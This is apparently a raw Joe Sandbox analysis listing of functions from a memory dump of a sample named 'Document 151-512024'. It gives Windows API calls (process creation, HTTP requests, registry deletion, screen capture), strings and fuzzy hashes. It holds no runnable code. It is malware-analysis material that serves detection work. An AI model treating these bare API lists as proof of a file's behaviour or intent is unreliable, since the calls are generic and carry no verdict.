SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 009D6E94
DestroyWindow.USER32(?), ref: 009D6EB5
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00940000,00000000), ref: 009D6EE4
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 009D6EFD
GetDesktopWindow.USER32 ref: 009D6F16
GetWindowRect.USER32(00000000), ref: 009D6F1D
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 009D6F35
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 009D6F4D

Part of subcall function 00959944: GetWindowLongW.USER32(?,000000EB), ref: 00959952

Strings

0, xrefs: 009D6D98
0n, xrefs: 009D6D0F, 009D6DCF, 009D6DF1, 009D6E04
tooltips_class32, xrefs: 009D6E58, 009D6EDD

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$0n$tooltips_class32
API String ID: 2429346358-2282341297
Opcode ID: fd85a23cfce3b1e914830fb3e070e05f2a893bb3dc138b1e84c4d740b458937e
Instruction ID: 21db47db15120829ffc68a7561ce9cc7aa3f9f1ae30459fff1310dcbd8435a62
Opcode Fuzzy Hash: fd85a23cfce3b1e914830fb3e070e05f2a893bb3dc138b1e84c4d740b458937e
Instruction Fuzzy Hash: 167178B4184245AFDB21CF18D844FAABBF9FB99304F44881EF99987360C770E946DB11

Function 009D911E Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00959BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00959BB2

DragQueryPoint.SHELL32(?,?), ref: 009D9147

Part of subcall function 009D7674: ClientToScreen.USER32(?,?), ref: 009D769A
Part of subcall function 009D7674: GetWindowRect.USER32(?,?), ref: 009D7710
Part of subcall function 009D7674: PtInRect.USER32(?,?,009D8B89), ref: 009D7720

SendMessageW.USER32(?,000000B0,?,?), ref: 009D91B0
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 009D91BB
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 009D91DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 009D9225
SendMessageW.USER32(?,000000B0,?,?), ref: 009D923E
SendMessageW.USER32(?,000000B1,?,?), ref: 009D9255
SendMessageW.USER32(?,000000B1,?,?), ref: 009D9277
DragFinish.SHELL32(?), ref: 009D927E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 009D9371

Strings

@GUI_DROPID, xrefs: 009D929E
0n, xrefs: 009D917D, 009D91EA
@GUI_DRAGID, xrefs: 009D92E9
@GUI_DRAGFILE, xrefs: 009D9320

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: 0n$@GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 221274066-2210429996
Opcode ID: 52426f408854968bfa610ac2291dee2ad5fbf961678d1dee9f560f89dea696e1
Instruction ID: a07e3ff8bc01bd648b98e1f6652ea445678ad83792ccad15988b285963d7c10f
Opcode Fuzzy Hash: 52426f408854968bfa610ac2291dee2ad5fbf961678d1dee9f560f89dea696e1
Instruction Fuzzy Hash: 2E617B71148301AFC701EF64DC85EAFBBE8EFC9750F404A1EF595922A1DB309A49CB52

Function 009CAFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 009CB198
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 009CB1B0
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 009CB1D4
_wcslen.LIBCMT ref: 009CB200
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 009CB214
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 009CB236
_wcslen.LIBCMT ref: 009CB332

Part of subcall function 009B05A7: GetStdHandle.KERNEL32(000000F6), ref: 009B05C6

_wcslen.LIBCMT ref: 009CB34B
_wcslen.LIBCMT ref: 009CB366
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 009CB3B6
GetLastError.KERNEL32(00000000), ref: 009CB407
CloseHandle.KERNEL32(?), ref: 009CB439
CloseHandle.KERNEL32(00000000), ref: 009CB44A
CloseHandle.KERNEL32(00000000), ref: 009CB45C
CloseHandle.KERNEL32(00000000), ref: 009CB46E
CloseHandle.KERNEL32(?), ref: 009CB4E3

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: e41dc911deaf3e749bc283555f5d229cd734ed065f34c063ea407525f7d57f2c
Instruction ID: bc866131419ffaa3c215320c9b69047c7120bfdae4dcf7ca9dec04b0910b21fb
Opcode Fuzzy Hash: e41dc911deaf3e749bc283555f5d229cd734ed065f34c063ea407525f7d57f2c
Instruction Fuzzy Hash: B7F17A71A082409FC714EF24C892F6EBBE5AFC5714F14895DF8999B2A2DB31EC44CB52

Function 0094326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(00A11990), ref: 00982F8D
GetMenuItemCount.USER32(00A11990), ref: 0098303D
GetCursorPos.USER32(?), ref: 00983081
SetForegroundWindow.USER32(00000000), ref: 0098308A
TrackPopupMenuEx.USER32(00A11990,00000000,?,00000000,00000000,00000000), ref: 0098309D
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 009830A9

Strings

0, xrefs: 0094327D

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: e848a629bd65690f9faafe9ce41c85bfe1d813d4d3b133ef2d13062006b085b6
Instruction ID: 5147f77b53c56699808052d7597554f9febd4e893544413dd6f8416b237e21db
Opcode Fuzzy Hash: e848a629bd65690f9faafe9ce41c85bfe1d813d4d3b133ef2d13062006b085b6
Instruction Fuzzy Hash: 18713C70644206BFEB219F74DC49F9ABF68FF45724F208216F6246A2E1C7B1AD50DB90

Function 00958BCD Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00958F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00958BE8,?,00000000,?,?,?,?,00958BBA,00000000,?), ref: 00958FC5

DestroyWindow.USER32(?), ref: 00958C81
KillTimer.USER32(00000000,?,?,?,?,00958BBA,00000000,?), ref: 00958D1B
DestroyAcceleratorTable.USER32(00000000), ref: 00996973
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00958BBA,00000000,?), ref: 009969A1
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00958BBA,00000000,?), ref: 009969B8
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00958BBA,00000000), ref: 009969D4
DeleteObject.GDI32(00000000), ref: 009969E6

Strings

0n, xrefs: 00958C06

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID: 0n
API String ID: 641708696-3368625520
Opcode ID: dbf97b8d1038a6a2245d53661e877ed74c67ff8d7eb998b6892e713a13a2f8be
Instruction ID: bfb23ffc1556f9357dfa0ed9d2bc44e54b97901b18f354a4fc1ccff72c60cc22
Opcode Fuzzy Hash: dbf97b8d1038a6a2245d53661e877ed74c67ff8d7eb998b6892e713a13a2f8be
Instruction Fuzzy Hash: BF61AB30106601DFCF21DF2AD948B6A77F5FB40313F108919E982AB6A0CB35AC89DF90

Function 009BC476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 009BC4B0
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 009BC4C3
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 009BC4D7
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 009BC4F0
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 009BC533
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 009BC549
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009BC554
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 009BC584
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 009BC5DC
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 009BC5F0
InternetCloseHandle.WININET(00000000), ref: 009BC5FB

Strings

, xrefs: 009BC575

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: 3bd5277dbddba92be5c08ba308e604029f8284773ba5e2949943f0ca7e3fd433
Instruction ID: 4830540769d0a19dc48365f3bb891f89d542db8fde5502213d49430c274ad310
Opcode Fuzzy Hash: 3bd5277dbddba92be5c08ba308e604029f8284773ba5e2949943f0ca7e3fd433
Instruction Fuzzy Hash: 7A514BF1545209BFDB219F64CA88AEB7BBCFF48764F00441AF945D6210DB74EA44EBA0

Function 00959838 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00959944: GetWindowLongW.USER32(?,000000EB), ref: 00959952

GetSysColor.USER32(0000000F), ref: 00959862

Strings

0n, xrefs: 0095987C

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: ColorLongWindow
String ID: 0n
API String ID: 259745315-3368625520
Opcode ID: cc4dc9b05e735dacb104f91bbd919aa3ec8e6d6ef94f467ec6089c50de1c5a1b
Instruction ID: 259edb6207621bb351ea9076ded7b61e5743458ac7bd957dba4e7ba6f336131e
Opcode Fuzzy Hash: cc4dc9b05e735dacb104f91bbd919aa3ec8e6d6ef94f467ec6089c50de1c5a1b
Instruction Fuzzy Hash: 6D41D471149610EFEF209F799C84BB93B69EB06332F144606FEA28B1E1C7309C85DB11

Function 009D856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 009D8592
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 009D85A2
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 009D85AD
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 009D85BA
GlobalLock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 009D85C8
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 009D85D7
GlobalUnlock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 009D85E0
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 009D85E7
CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 009D85F8
OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,009DFC38,?), ref: 009D8611
GlobalFree.KERNEL32(00000000), ref: 009D8621
GetObjectW.GDI32(?,00000018,?), ref: 009D8641
CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 009D8671
DeleteObject.GDI32(?), ref: 009D8699
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 009D86AF

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 04cd625237ff3d66e86f04eff33dd7bf891f99433fb771369b9d1216b552c0b8
Instruction ID: e437139f1dcbf01d89603ea0ebfb489ac078da978f2c1d488b3102cb16bf6b81
Opcode Fuzzy Hash: 04cd625237ff3d66e86f04eff33dd7bf891f99433fb771369b9d1216b552c0b8
Instruction Fuzzy Hash: EE4159B1681205AFDB108FA5DC48EAF7BBCEF89751F00815AF915E7260DB30D941DB20

Function 009B14BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 009B1502
VariantCopy.OLEAUT32(?,?), ref: 009B150B
VariantClear.OLEAUT32(?), ref: 009B1517
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 009B15FB
VarR8FromDec.OLEAUT32(?,?), ref: 009B1657
VariantInit.OLEAUT32(?), ref: 009B1708
SysFreeString.OLEAUT32(?), ref: 009B178C
VariantClear.OLEAUT32(?), ref: 009B17D8
VariantClear.OLEAUT32(?), ref: 009B17E7
VariantInit.OLEAUT32(00000000), ref: 009B1823

Strings

Default, xrefs: 009B16AF
%4d%02d%02d%02d%02d%02d, xrefs: 009B1625

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 1234038744-3931177956
Opcode ID: 1a1d26c8c70b46834b7a01676cbb86402e23ea9146fe49d57976a24d874af8f1
Instruction ID: 9180d8bc21d836e20ff2b3756de0209e491a1b385ddd39bc5783a65948297af9
Opcode Fuzzy Hash: 1a1d26c8c70b46834b7a01676cbb86402e23ea9146fe49d57976a24d874af8f1
Instruction Fuzzy Hash: 78D14472A00105EBCB20DF65E9A4BBDB7B9BF84720F908556F807AB180DB74DC45DBA1

Function 009CB60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00949CB3: _wcslen.LIBCMT ref: 00949CBD

Part of subcall function 009CC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,009CB6AE,?,?), ref: 009CC9B5
Part of subcall function 009CC998: _wcslen.LIBCMT ref: 009CC9F1
Part of subcall function 009CC998: _wcslen.LIBCMT ref: 009CCA68
Part of subcall function 009CC998: _wcslen.LIBCMT ref: 009CCA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009CB6F4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009CB772
RegDeleteValueW.ADVAPI32(?,?), ref: 009CB80A
RegCloseKey.ADVAPI32(?), ref: 009CB87E
RegCloseKey.ADVAPI32(?), ref: 009CB89C
LoadLibraryA.KERNEL32(advapi32.dll), ref: 009CB8F2
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 009CB904
RegDeleteKeyW.ADVAPI32(?,?), ref: 009CB922
FreeLibrary.KERNEL32(00000000), ref: 009CB983
RegCloseKey.ADVAPI32(00000000), ref: 009CB994

Strings

RegDeleteKeyExW, xrefs: 009CB8FE
advapi32.dll, xrefs: 009CB8ED

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: 9637bc06b5b9793c9c2441c0252e123c6448d83b3f3ff81d4982deef5d72ce9f
Instruction ID: 57442c9a7b1a41f1d111b82aecb927546ef47abbfc69c7a78bdab2fd6a8c1753
Opcode Fuzzy Hash: 9637bc06b5b9793c9c2441c0252e123c6448d83b3f3ff81d4982deef5d72ce9f
Instruction Fuzzy Hash: 31C17C70609201AFD714DF24C495F2ABBE5FF84318F14899CF49A8B6A2CB35ED45CB92

Function 009D8D0E Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00959BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00959BB2

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 009D8D5A
GetFocus.USER32 ref: 009D8D6A
GetDlgCtrlID.USER32(00000000), ref: 009D8D75
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 009D8E1D
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 009D8ECF
GetMenuItemCount.USER32(?), ref: 009D8EEC
GetMenuItemID.USER32(?,00000000), ref: 009D8EFC
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 009D8F2E
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 009D8F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 009D8FA1

Strings

0n, xrefs: 009D8E63, 009D8E85
0, xrefs: 009D8E9F

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0$0n
API String ID: 1026556194-2816077665
Opcode ID: 0716b4df811e93f6e56df977196a3d6380cc16d0edd1394558a2ee5725c1f83c
Instruction ID: ce0d903a832466371ca21972b98787e1cdb574991555312510d39b3efd004778
Opcode Fuzzy Hash: 0716b4df811e93f6e56df977196a3d6380cc16d0edd1394558a2ee5725c1f83c
Instruction Fuzzy Hash: A281B1B1548301AFD710DF18D884AAB7BEDFB88754F04891EF98497392DB30D941DBA1

Function 009D541D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 009D5504
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 009D5515
CharNextW.USER32(00000158), ref: 009D5544
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 009D5585
SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 009D559B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 009D55AC

Strings

0n, xrefs: 009D545F

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: MessageSend$CharNext
String ID: 0n
API String ID: 1350042424-3368625520
Opcode ID: 124652dd4c8ccae5a4c6f9dcf9ce50288b67d6bc5a5f27beb893a7dc78ea6f58
Instruction ID: 132cd103b935987b73208f71792591745ccf5442c6841d7c83ac9d027db937e8
Opcode Fuzzy Hash: 124652dd4c8ccae5a4c6f9dcf9ce50288b67d6bc5a5f27beb893a7dc78ea6f58
Instruction Fuzzy Hash: 4261AD70984609ABDF108F94CC84EFE7BB9EB09360F51C54BF925A73A0D7748A81DB61

Function 009C255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 009C25D8
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 009C25E8
CreateCompatibleDC.GDI32(?), ref: 009C25F4
SelectObject.GDI32(00000000,?), ref: 009C2601
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 009C266D
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 009C26AC
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 009C26D0
SelectObject.GDI32(?,?), ref: 009C26D8
DeleteObject.GDI32(?), ref: 009C26E1
DeleteDC.GDI32(?), ref: 009C26E8
ReleaseDC.USER32(00000000,?), ref: 009C26F3

Strings

(, xrefs: 009C268D

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: ec48837ba3c1339add5ca4018a05feed0057e67e02815a7443d7da937d44344c
Instruction ID: b8b0ff34540dd57a3f95675f001f6178d5ba24f75ca276d01e0039a64c204e8d
Opcode Fuzzy Hash: ec48837ba3c1339add5ca4018a05feed0057e67e02815a7443d7da937d44344c
Instruction Fuzzy Hash: 196102B5D0421AEFCF04CFA8D984EAEBBB5FF48310F20852AE955A7250D770A941DF60

Function 0097DA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0097DAA1

Part of subcall function 0097D63C: _free.LIBCMT ref: 0097D659
Part of subcall function 0097D63C: _free.LIBCMT ref: 0097D66B
Part of subcall function 0097D63C: _free.LIBCMT ref: 0097D67D
Part of subcall function 0097D63C: _free.LIBCMT ref: 0097D68F
